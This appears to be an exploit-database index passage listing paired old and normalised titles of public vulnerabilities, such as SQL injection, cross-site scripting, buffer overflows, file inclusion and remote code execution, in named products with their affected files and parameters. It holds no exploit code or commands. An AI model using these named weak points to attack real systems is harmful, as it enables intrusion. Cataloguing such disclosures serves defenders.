NETGEAR FM114P ProSafe Wireless Router - Rule Bypass M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Cross-Site Scripting M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Cross-Site Scripting M-TECH P-Synch 6.2.5 - 'nph-psf.exe' 'css' Parameter Cross-Site Scripting M-TECH P-Synch 6.2.5 - 'nph-psa.exe' 'css' Parameter Cross-Site Scripting Microsoft Internet Explorer 6 -' %USERPROFILE%' File Execution Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution EZMeeting 3.x - EZNet.exe Long HTTP Request Remote Buffer Overflow EZMeeting 3.x - 'EZNet.exe' Long HTTP Request Remote Buffer Overflow Enterasys NetSight - nssyslogd.exe Buffer Overflow (Metasploit) IBM Cognos - tm1admsd.exe Overflow (Metasploit) Enterasys NetSight - 'nssyslogd.exe' Buffer Overflow (Metasploit) IBM Cognos - 'tm1admsd.exe' Overflow (Metasploit) Webcam Corp Webcam Watchdog 4.0.1 - sresult.exe Cross-Site Scripting Webcam Corp Webcam Watchdog 4.0.1 - 'sresult.exe' Cross-Site Scripting Microsoft Windows XP/2000/2003 -'winhlp32' Phrase Integer Overflow Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow Oracle 8.x/9.x/10.x - Database Multiple SQL Injection Oracle 8.x/9.x/10.x Database - Multiple SQL Injections SAP Business Connector 4.6/4.7 - chopSAPLog.dsp fullName Variable Arbitrary File Disclosure SAP Business Connector 4.6/4.7 - deleteSingle fullName Variable Arbitrary File Deletion SAP Business Connector 4.6/4.7 - adapter-index.dsp url Variable Arbitrary Site Redirect SAP Business Connector 4.6/4.7 - 'chopSAPLog.dsp' 'fullName' Parameter Arbitrary File Disclosure SAP Business Connector 4.6/4.7 - 'deleteSingle' 'fullName' Parameter Arbitrary File Deletion SAP Business Connector 4.6/4.7 - 'adapter-index.dsp' 'url' Parameter Arbitrary Site Redirect Microsoft PowerPoint 2003 - powerpnt.exe Unspecified Issue Microsoft PowerPoint 2003 - 'powerpnt.exe' Unspecified Issue Cruiseworks 1.09 - Cws.exe Doc Directory Traversal Cruiseworks 1.09 - Cws.exe Doc Buffer Overflow Cruiseworks 1.09 - 'Cws.exe' Doc Directory Traversal Cruiseworks 1.09 - 'Cws.exe' Doc Buffer Overflow aBitWhizzy - whizzypic.php d Variable Traversal Arbitrary Directory Listing aBitWhizzy - 'whizzypic.php' 'd' ParameterTraversal Arbitrary Directory Listing LANDesk Management Suite 8.7 Alert Service - AOLSRVR.exe Buffer Overflow LANDesk Management Suite 8.7 Alert Service - 'AOLSRVR.exe' Buffer Overflow Trend Micro ServerProtect 5.58 - SpntSvc.exe Remote Stack Based Buffer Overflow Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Based Buffer Overflow ABB MicroSCADA - wserver.exe Remote Code Execution (Metasploit) ABB MicroSCADA - 'wserver.exe' Remote Code Execution (Metasploit) SAP DB 7.x Web Server - WAHTTP.exe Multiple Buffer Overflow Vulnerabilities SAP DB 7.x Web Server - 'WAHTTP.exe' Multiple Buffer Overflow Vulnerabilities Cisco User-Changeable Password (UCP) 3.3.4.12.5 - CSUserCGI.exe Help Facility Cross-Site Scripting Cisco User-Changeable Password (UCP) 3.3.4.12.5 - 'CSUserCGI.exe' Help Facility Cross-Site Scripting HP OpenView Network Node Manager (OV NNM) 7.x -OpenView5.exe Action Parameter Traversal Arbitrary File Access HP OpenView Network Node Manager (OV NNM) 7.x - 'OpenView5.exe' Action Parameter Traversal Arbitrary File Access F5 FirePass 6.0.2.3 - /vdesk/admincon/webyfiers.php css_exceptions Parameter Cross-Site Scripting F5 FirePass 6.0.2.3 - /vdesk/admincon/index.php sql_matchscope Parameter Cross-Site Scripting F5 FirePass 6.0.2.3 - '/vdesk/admincon/webyfiers.php' 'css_exceptions' Parameter Cross-Site Scripting F5 FirePass 6.0.2.3 - '/vdesk/admincon/index.php' 'sql_matchscope' Parameter Cross-Site Scripting GE Proficy CIMPLICITY - gefebt.exe Remote Code Execution (Metasploit) GE Proficy CIMPLICITY - 'gefebt.exe' Remote Code Execution (Metasploit) SolidWorks Workgroup PDM 2014 - pdmwService.exe Arbitrary File Write (Metasploit) SolidWorks Workgroup PDM 2014 - 'pdmwService.exe' Arbitrary File Write (Metasploit) Yokogawa CENTUM CS 3000 - BKHOdeq.exe Buffer Overflow (Metasploit) Yokogawa CENTUM CS 3000 - BKBCopyD.exe Buffer Overflow (Metasploit) Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Buffer Overflow (Metasploit) Yokogawa CENTUM CS 3000 - 'BKBCopyD.exe' Buffer Overflow (Metasploit) Apache Geronimo 2.1.x - /console/portal/Server/Monitoring Multiple Parameter Cross-Site Scripting Apache Geronimo 2.1.x - '/console/portal/Server/Monitoring' Multiple Parameter Cross-Site Scripting Comtrend CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting COMTREND CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - /diagnose Multiple Parameter Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - /configuration Multiple Parameter Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - /scripter.php Multiple Parameter Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - '/diagnose' Multiple Parameter Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - '/configuration' Multiple Parameter Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - '/scripter.php' Multiple Parameter Cross-Site Scripting Yokogawa CS3000 - BKESimmgr.exe Buffer Overflow (Metasploit) Yokogawa CS3000 - 'BKESimmgr.exe' Buffer Overflow (Metasploit) Yokogawa CS3000 - BKFSim_vhfd.exe Buffer Overflow (Metasploit) Yokogawa CS3000 - 'BKFSim_vhfd.exe' Buffer Overflow (Metasploit) U.S.Robotics USR5463 0.06 - Firmware setup_ddns.exe HTML Injection U.S.Robotics USR5463 0.06 Firmware - 'setup_ddns.exe' HTML Injection WhatsApp 2.11.476 - Remote Reboot/Crash App Android Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/E1Menu.maf jdeowpBackButtonProtect Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/E1Menu_Menu.mafService e1.namespace Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/E1Menu_OCL.mafService e1.namespace Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/MafletClose.mafService RENDER_MAFLET Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter Cross-Site Scripting WhatsApp 2.11.476 (Android) - Remote Reboot/Crash App (Denial of Service) Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu.maf' 'jdeowpBackButtonProtect' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService' 'e1.namespace' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService' 'e1.namespace' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/MafletClose.mafService' 'RENDER_MAFLET' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/JASMafletMafBrowserClose.mafService' 'jdemafjasLinkTarget' Parameter Cross-Site Scripting Linksys WRT54GL (Wireless Router) - Cross-Site Request Forgery Linksys WRT54GL Wireless Router - Cross-Site Request Forgery Cisco Linksys E4200 - /apply.cgi Multiple Parameter Cross-Site Scripting Cisco Linksys E4200 - '/apply.cgi' Multiple Parameter Cross-Site Scripting Seowon Intech WiMAX SWC-9100 Router - /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi' 'ping_ipaddr' Parameter Remote Code Execution Netgear D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution Netgear D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution Comtrend CT-5361T Router - Password.cgi Cross-Site Request Forgery (Admin Password Manipulation) COMTREND CT-5361T Router - 'Password.cgi' Cross-Site Request Forgery (Admin Password Manipulation) Alfresco - /proxy endpoint Parameter Server-Side Request Forgery Alfresco - /cmisbrowser url Parameter Server-Side Request Forgery Alfresco - '/proxy' 'endpoint' Parameter Server-Side Request Forgery Alfresco - '/cmisbrowser' 'url' Parameter Server-Side Request Forgery PhpTagCool 1.0.3 - SQL Injection Attacks Exploit PhpTagCool 1.0.3 - SQL Injection phpBB 2.0.18 - Remote Brute Force/Dictionary Attack Tool (2) phpBB 2.0.18 - Remote Brute Force/Dictionary (2) Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Attack Vectors Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Yrch 1.0 - 'plug.inc.php path Variable' Remote File Inclusion Yrch 1.0 - 'plug.inc.php' 'path' Parameter Remote File Inclusion Vizayn Haber - 'haberdetay.asp id Variable' SQL Injection Vizayn Haber - 'haberdetay.asp' 'id' Parameter SQL Injection iG Calendar 1.0 - 'user.php id Variable' SQL Injection iG Calendar 1.0 - 'user.php' 'id' Parameter SQL Injection MGB 0.5.4.5 - 'email.php id Variable' SQL Injection MGB 0.5.4.5 - 'email.php' 'id' Parameter SQL Injection Alstrasoft e-Friends 4.98 - (seid) Multiple SQL Injection Alstrasoft e-Friends 4.98 - 'seid' Multiple SQL Injections MyPHP Forum 3.0 - (Final) Multiple SQL Injection MyPHP Forum 3.0 (Final) - Multiple SQL Injections File Store PRO 3.2 - Multiple Blind SQL Injection File Store PRO 3.2 - Multiple Blind SQL Injections AssetMan 2.5-b - SQL Injection using Session Fixation Attack AssetMan 2.5-b - SQL Injection using Session Fixation Kasra CMS - 'index.php' Multiple SQL Injection Kasra CMS - 'index.php' Multiple SQL Injections NEWSolved 1.1.6 - 'login grabber' Multiple SQL Injection NEWSolved 1.1.6 - 'login grabber' Multiple SQL Injections T-HTB Manager 0.5 - Multiple Blind SQL Injection T-HTB Manager 0.5 - Multiple Blind SQL Injections Joomla! Component com_oziogallery2 - / IMAGIN Arbitrary file write Joomla! Component com_oziogallery2 / IMAGIN - Arbitrary File Write Open Bulletin Board - Multiple Blind SQL Injection Open Bulletin Board - Multiple Blind SQL Injections AJ Matrix 3.1 - 'id' Multiple SQL Injection AJ Matrix 3.1 - 'id' Multiple SQL Injections Zylone IT - Multiple Blind SQL Injection Zylone IT - Multiple Blind SQL Injections WhiteBoard 0.1.30 - Multiple Blind SQL Injection WhiteBoard 0.1.30 - Multiple Blind SQL Injections AV Arcade 3 - Cookie SQL Injection Authentication Bypass AV Arcade 3 - Cookie SQL Injection / Authentication Bypass Joomla! Component Teams - Multiple Blind SQL Injection Joomla! Component Teams - Multiple Blind SQL Injections AneCMS - /registre/next SQL Injection AneCMS - '/registre/next' SQL Injection Joomla! Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injection Joomla! Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injections Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injection Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injections ColdOfficeView 2.04 - Multiple Blind SQL Injection ColdOfficeView 2.04 - Multiple Blind SQL Injections Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injection Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injections Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injection Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injections Projekt Shop - 'details.php' Multiple SQL Injection Projekt Shop - 'details.php' Multiple SQL Injections PixelPost 1.7.3 - Multiple POST Variables SQL Injection PixelPost 1.7.3 - Multiple POST Parameter SQL Injections Webcat - Multiple Blind SQL Injection Webcat - Multiple Blind SQL Injections LiteRadius 3.2 - Multiple Blind SQL Injection LiteRadius 3.2 - Multiple Blind SQL Injections PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injection PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injections Comtrend Router CT-5624 - Root/Support Password Disclosure/Change Exploit COMTREND CT-5624 Router - Root/Support Password Disclosure/Change Exploit Sagem F@ST 2604 (ADSL Router) - Cross-Site Request Forgery Sagem F@ST 2604 ADSL Router - Cross-Site Request Forgery Rivettracker 1.03 - Multiple SQL Injection Rivettracker 1.03 - Multiple SQL Injections ArticleSetup - Multiple Persistence Cross-Site Scripting / SQL Injection ArticleSetup - Multiple Persistence Cross-Site Scripting / SQL Injections PHP Ticket System Beta 1 - 'index.php p Parameter' SQL Injection PHP Ticket System Beta 1 - 'index.php' 'p' Parameter SQL Injection X-Cart Gold 4.5 - 'products_map.php symb Parameter' Cross-Site Scripting X-Cart Gold 4.5 - 'products_map.php' 'symb' Parameter Cross-Site Scripting Symantec Web Gateway 5.0.2 - 'blocked.php id Parameter' Blind SQL Injection Symantec Web Gateway 5.0.2 - 'blocked.php' 'id' Parameter Blind SQL Injection Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php groupid Parameter' Blind SQL Injection Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php' 'groupid' Parameter Blind SQL Injection Openconstructor CMS 3.12.0 - 'id' Parameter Multiple SQL Injection Openconstructor CMS 3.12.0 - 'id' Parameter Multiple SQL Injections YourArcadeScript 2.4 - 'index.php id Parameter' SQL Injection YourArcadeScript 2.4 - 'index.php' 'id' Parameter SQL Injection AV Arcade Free Edition - 'add_rating.php id Parameter' Blind SQL Injection AV Arcade Free Edition - 'add_rating.php' 'id' Parameter Blind SQL Injection QNAP Turbo NAS TS-1279U-RP - Multiple Path Injection QNAP Turbo NAS TS-1279U-RP - Multiple Path Injections Blog Mod 0.1.9 - 'index.php month Parameter' SQL Injection Blog Mod 0.1.9 - 'index.php' 'month' Parameter SQL Injection Authoria HR Suite - AthCGI.exe Cross-Site Scripting Authoria HR Suite - 'AthCGI.exe' Cross-Site Scripting MyBB Profile Albums Plugin 0.9 - 'albums.php album Parameter' SQL Injection MyBB Profile Albums Plugin 0.9 - 'albums.php' 'album' Parameter SQL Injection M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Remote File Inclusion M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Remote File Inclusion M-TECH P-Synch 6.2.5 - 'nph-psf.exe' 'css' Parameter Remote File Inclusion M-TECH P-Synch 6.2.5 - 'nph-psa.exe' 'css' Parameter Remote File Inclusion friendsinwar FAQ Manager - SQL Injection (Authentication Bypass) friendsinwar FAQ Manager - SQL Injection / Authentication Bypass friendsinwar FAQ Manager - 'view_faq.php question Parameter' SQL Injection friendsinwar FAQ Manager - 'view_faq.php' 'question' Parameter SQL Injection SmartCMS - 'index.php idx Parameter' SQL Injection SmartCMS - 'index.php' 'idx' Parameter SQL Injection SmartCMS - 'index.php menuitem Parameter' SQL Injection / Cross-Site Scripting SmartCMS - 'index.php' 'menuitem' Parameter SQL Injection / Cross-Site Scripting Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injection Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injections MyBB AwayList Plugin - 'index.php id Parameter' SQL Injection MyBB AwayList Plugin - 'index.php' 'id' Parameter SQL Injection PHP-Nuke Error Manager Module 2.1 - error.php language Variable Full Path Disclosure PHP-Nuke Error Manager Module 2.1 - error.php Multiple Variables Cross-Site Scripting PHP-Nuke Error Manager Module 2.1 - 'error.php' 'language' Parameter Full Path Disclosure PHP-Nuke Error Manager Module 2.1 - 'error.php' Multiple Parameters Cross-Site Scripting phpHeaven phpMyChat 0.14.5 - edituser.php3 do_not_login Variable Authentication Bypass phpHeaven phpMyChat 0.14.5 - 'edituser.php3' 'do_not_login' Parameter Authentication Bypass NConf 1.3 - 'detail.php detail_admin_items.php id Parameter' SQL Injection NConf 1.3 - 'detail.php' 'detail_admin_items.php' 'id' Parameter SQL Injection Gattaca Server 2003 - Language Variable Path Exposure Gattaca Server 2003 - 'Language' Parameter Path Exposure AntiBoard 0.6/0.7 - antiboard.php Multiple Parameter SQL Injection AntiBoard 0.6/0.7 - antiboard.php Multiple Parameter SQL Injections Scripts Genie Gallery Personals - 'gallery.php L Parameter' SQL Injection Scripts Genie Gallery Personals - 'gallery.php' L' Parameter SQL Injection AdaptCMS 2.0.4 - 'config.php question Parameter' SQL Injection AdaptCMS 2.0.4 - 'config.php' 'question' Parameter SQL Injection Scripts Genie Domain Trader - 'catalog.php id Parameter' SQL Injection Scripts Genie Domain Trader - 'catalog.php' 'id' Parameter SQL Injection Scripts Genie Games Site Script - 'index.php id Parameter' SQL Injection Scripts Genie Games Site Script - 'index.php' 'id' Parameter SQL Injection Scripts Genie Top Sites - 'out.php id Parameter' SQL Injection Scripts Genie Top Sites - 'out.php' 'id' Parameter SQL Injection Scripts Genie Hot Scripts Clone - 'showcategory.php cid Parameter' SQL Injection Scripts Genie Hot Scripts Clone - 'showcategory.php' 'cid' Parameter SQL Injection PHPMyRecipes 1.2.2 - 'viewrecipe.php r_id Parameter' SQL Injection PHPMyRecipes 1.2.2 - 'viewrecipe.php' 'r_id' Parameter SQL Injection MTP Image Gallery 1.0 - 'edit_photos.php title Parameter' Cross-Site Scripting MTP Image Gallery 1.0 - 'edit_photos.php' 'title' Parameter Cross-Site Scripting D-Link DSL-2740B (ADSL Router) - Authentication Bypass D-Link DSL-2740B ADSL Router - Authentication Bypass TIPS MailPost 5.1.1 - APPEND Variable Cross-Site Scripting TIPS MailPost 5.1.1 - 'APPEND' Parameter Cross-Site Scripting DUclassified 4.x - adDetail.asp Multiple Parameter SQL Injection DUclassified 4.x - 'adDetail.asp' Multiple Parameter SQL Injections Rebus:list - 'list.php list_id Parameter' SQL Injection Rebus:list - 'list.php' 'list_id' Parameter SQL Injection SynConnect Pms - 'index.php loginid Parameter' SQL Injection SynConnect Pms - 'index.php' 'loginid' Parameter SQL Injection AWS Xms 2.5 - 'importer.php what Parameter' Directory Traversal Pollen CMS 0.6 - 'index.php p Parameter' Local File Disclosure AWS Xms 2.5 - 'importer.php' 'what' Parameter Directory Traversal Pollen CMS 0.6 - 'index.php' 'p' Paramete' Local File Disclosure WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php hash Parameter' SQL Injection WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php' 'hash Parameter SQL Injection Kayako eSupport 2.x - Ticket System Multiple SQL Injection Kayako eSupport 2.x - Ticket System Multiple SQL Injections BibORB 1.3.2 Login Module - Multiple Parameter SQL Injection BibORB 1.3.2 Login Module - Multiple Parameter SQL Injections Active Auction House - default.asp Multiple SQL Injection Active Auction House - 'default.asp' Multiple SQL Injections CubeCart 2.0.x - 'index.php' Multiple Variable Full Path Disclosure CubeCart 2.0.x - tellafriend.php product Variable Full Path Disclosure CubeCart 2.0.x - view_cart.php add Variable Full Path Disclosure CubeCart 2.0.x - view_product.php product Variable Full Path Disclosure CubeCart 2.0.x - 'index.php' Multiple Parameter Full Path Disclosure CubeCart 2.0.x - 'tellafriend.php' 'product' Parameter Full Path Disclosure CubeCart 2.0.x - 'view_cart.php' 'add' Parameter Full Path Disclosure CubeCart 2.0.x - 'view_product.php' 'product' Parameter Full Path Disclosure OneWorldStore - 'OWListProduct.asp' Multiple SQL Injection OneWorldStore - 'OWListProduct.asp' Multiple SQL Injections WHMCS 4.x - 'invoicefunctions.php id Parameter' SQL Injection WHMCS 4.x - 'invoicefunctions.php' 'id' Parameter SQL Injection DUportal Pro 3.4 - default.asp Multiple Parameter SQL Injection DUportal Pro 3.4 - 'default.asp' Multiple Parameter SQL Injections DUportal Pro 3.4 - inc_vote.asp Multiple Parameter SQL Injection DUportal Pro 3.4 - result.asp Multiple Parameter SQL Injection DUportal Pro 3.4 - cat.asp Multiple Parameter SQL Injection DUportal Pro 3.4 - detail.asp Multiple Parameter SQL Injection DUportal Pro 3.4 - 'inc_vote.asp' Multiple Parameter SQL Injections DUportal Pro 3.4 - 'result.asp' Multiple Parameter SQL Injections DUportal Pro 3.4 - 'cat.asp' Multiple Parameter SQL Injections DUportal Pro 3.4 - 'detail.asp' Multiple Parameter SQL Injections DUportal 3.1.2 - inc_rating.asp Multiple Parameter SQL Injection DUportal 3.1.2 - 'inc_rating.asp' Multiple Parameter SQL Injections StorePortal 2.63 - default.asp Multiple SQL Injection StorePortal 2.63 - 'default.asp' Multiple SQL Injections MetaCart2 - SearchAction.asp Multiple SQL Injection MetaCart2 - 'SearchAction.asp' Multiple SQL Injections Claroline E-Learning 1.5/1.6 - userInfo.php Multiple Parameter SQL Injection Claroline E-Learning 1.5/1.6 - 'userInfo.php' Multiple Parameter SQL Injections JGS-Portal 3.0.1 - ID Variable SQL Injection JGS-Portal 3.0.1 - 'ID' Parameter SQL Injection AVE.CMS 2.09 - 'index.php module Parameter' Blind SQL Injection AVE.CMS 2.09 - 'index.php' 'module' Parameter Blind SQL Injection RadioCMS 2.2 - 'menager.php playlist_id Parameter' SQL Injection RadioCMS 2.2 - 'menager.php' 'playlist_id' Parameter SQL Injection NPDS 4.8 - /5.0 modules.php Lettre Parameter Cross-Site Scripting NPDS 4.8 /5.0 - 'modules.php' Lettre Parameter Cross-Site Scripting Ampache 3.4.3 - 'login.php' Multiple SQL Injection Ampache 3.4.3 - 'login.php' Multiple SQL Injections FlatNuke 2.5.x - 'index.php' where Variable Full Path Disclosure FlatNuke 2.5.x - 'index.php' 'where' Parameter Full Path Disclosure CarLine Forum Russian Board 4.2 - reply_in.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - 'reply_in.php' Multiple Parameter SQL Injections CarLine Forum Russian Board 4.2 - memory.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - line.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - in.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - enter.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - 'memory.php' Multiple Parameter SQL Injections CarLine Forum Russian Board 4.2 - 'line.php' Multiple Parameter SQL Injections CarLine Forum Russian Board 4.2 - 'in.php' Multiple Parameter SQL Injections CarLine Forum Russian Board 4.2 - 'enter.php' Multiple Parameter SQL Injections osTicket 1.2/1.3 - view.php inc Variable Arbitrary Local File Inclusion osTicket 1.2/1.3 - 'view.php' 'inc' Parameter Arbitrary Local File Inclusion Ruubikcms 1.1.1 - 'tinybrowser.php folder Parameter' Directory Traversal Ruubikcms 1.1.1 - 'tinybrowser.php' 'folder' Parameter Directory Traversal Simple PHP Agenda 2.2.8 - 'edit_event.php eventid Parameter' SQL Injection Simple PHP Agenda 2.2.8 - 'edit_event.php' 'eventid' Parameter SQL Injection PHPFreeNews 1.40 - searchresults.php Multiple SQL Injection PHPFreeNews 1.40 - searchresults.php Multiple SQL Injections Aenovo - /Password/default.asp Password Field SQL Injection Aenovo - /incs/searchdisplay.asp strSQL Parameter SQL Injection Aenovo - '/Password/default.asp' Password Field SQL Injection Aenovo - '/incs/searchdisplay.asp' strSQL Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - /admincp/user.php Multiple Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - /admincp/usertitle.php usertitleid Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - /admincp/usertools.php ids Parameter SQL Injection NooToplist 1.0 - 'index.php' Multiple SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - /admincp/css.php group Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - /admincp/index.php Multiple Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - /admincp/user.php email Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - /admincp/language.php goto Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - /admincp/modlog.php orderby Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - /admincp/template.php Multiple Parameter Cross-Site Scripting MX Shop 3.2 - 'index.php' Multiple SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' Multiple Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertitle.php' 'usertitleid' Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertools.php' 'ids' Parameter SQL Injection NooToplist 1.0 - 'index.php' Multiple SQL Injections vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/css.php' 'group' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/index.php' Multiple Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' 'email' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/language.php' 'goto' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/modlog.php' 'orderby' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/template.php' Multiple Parameter Cross-Site Scripting MX Shop 3.2 - 'index.php' Multiple SQL Injections Top Games Script 1.2 - 'play.php gid Parameter' SQL Injection Top Games Script 1.2 - 'play.php' 'gid' Parameter SQL Injection Elemata CMS RC3.0 - 'global.php id Parameter' SQL Injection Elemata CMS RC3.0 - 'global.php' 'id' Parameter SQL Injection Woltlab 1.1/2.x - Info-DB Info_db.php Multiple SQL Injection Woltlab 1.1/2.x - 'Info-DB Info_db.php' Multiple SQL Injections OaBoard 1.0 - forum.php Multiple SQL Injection OaBoard 1.0 - 'forum.php' Multiple SQL Injections Comersus Backoffice 4.x/5.0/6.0 - /comersus/database/comersus.mdb Direct Request Database Disclosure Comersus Backoffice 4.x/5.0/6.0 - '/comersus/database/comersus.mdb' Direct Request Database Disclosure PHP-Charts 1.0 - 'index.php type Parameter' Remote Code Execution PHP-Charts 1.0 - 'index.php' 'type' Parameter Remote Code Execution PHPList Mailing List Manager 2.x - /admin/admin.php id Parameter SQL Injection PHPList Mailing List Manager 2.x - /admin/editattributes.php id Parameter SQL Injection PHPList Mailing List Manager 2.x - /admin/eventlog.php Multiple Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - /admin/configure.php id Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - /admin/users.php find Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - '/admin/admin.php' 'id' Parameter SQL Injection PHPList Mailing List Manager 2.x - '/admin/editattributes.php' 'id' Parameter SQL Injection PHPList Mailing List Manager 2.x - '/admin/eventlog.php' Multiple Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - '/admin/configure.php' 'id' Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - '/admin/users.php' 'find' Parameter Cross-Site Scripting Walla TeleSite 3.0 - ts.exe tsurl Variable Arbitrary Article Access Walla TeleSite 3.0 - ts.exe sug Parameter Cross-Site Scripting Walla TeleSite 3.0 - ts.exe sug Parameter SQL Injection Walla TeleSite 3.0 - 'ts.exe' 'tsurl' Parameter Arbitrary Article Access Walla TeleSite 3.0 - 'ts.exe' 'sug' Parameter Cross-Site Scripting Walla TeleSite 3.0 - 'ts.exe' 'sug' Parameter SQL Injection Pearl Forums 2.0 - 'index.php' Multiple SQL Injection Pearl Forums 2.0 - 'index.php' Multiple SQL Injections Helpdesk Issue Manager 0.x - find.php Multiple Parameter SQL Injection Helpdesk Issue Manager 0.x - 'find.php' Multiple Parameter SQL Injection PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injection Cars Portal 1.1 - 'index.php' Multiple SQL Injection PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injections Cars Portal 1.1 - 'index.php' Multiple SQL Injections IceWarp Universal WebMail - /accounts/inc/include.php Multiple Parameter Remote File Inclusion IceWarp Universal WebMail - /admin/inc/include.php Multiple Parameter Remote File Inclusion IceWarp Universal WebMail - /dir/include.html lang Parameter Local File Inclusion IceWarp Universal WebMail - /mail/settings.html Language Parameter Local File Inclusion IceWarp Universal WebMail - /mail/index.html lang_settings Parameter Remote File Inclusion IceWarp Universal WebMail - /mail/include.html Crafted HTTP_USER_AGENT Arbitrary File Access IceWarp Universal WebMail - '/accounts/inc/include.php' Multiple Parameter Remote File Inclusion IceWarp Universal WebMail - '/admin/inc/include.php' Multiple Parameter Remote File Inclusion IceWarp Universal WebMail - '/dir/include.html' 'lang' Parameter Local File Inclusion IceWarp Universal WebMail - '/mail/settings.html' 'Language' Parameter Local File Inclusion IceWarp Universal WebMail - '/mail/index.html' 'lang_settings' Parameter Remote File Inclusion IceWarp Universal WebMail - '/mail/include.html' Crafted HTTP_USER_AGENT Arbitrary File Access PHPJournaler 1.0 - Readold Variable SQL Injection PHPJournaler 1.0 - 'Readold' Parameter SQL Injection ScozNet ScozBook 1.1 - AdminName Variable SQL Injection ScozNet ScozBook 1.1 - 'AdminName' Parameter SQL Injection OnePlug CMS - /press/details.asp Press_Release_ID Parameter SQL Injection OnePlug CMS - /services/details.asp Service_ID Parameter SQL Injection OnePlug CMS - /products/details.asp Product_ID Parameter SQL Injection OnePlug CMS - '/press/details.asp' 'Press_Release_ID' Parameter SQL Injection OnePlug CMS - '/services/details.asp' 'Service_ID' Parameter SQL Injection OnePlug CMS - '/products/details.asp' 'Product_ID' Parameter SQL Injection Venom Board - Post.php3 Multiple SQL Injection Venom Board - 'Post.php3' Multiple SQL Injections microBlog 2.0 - 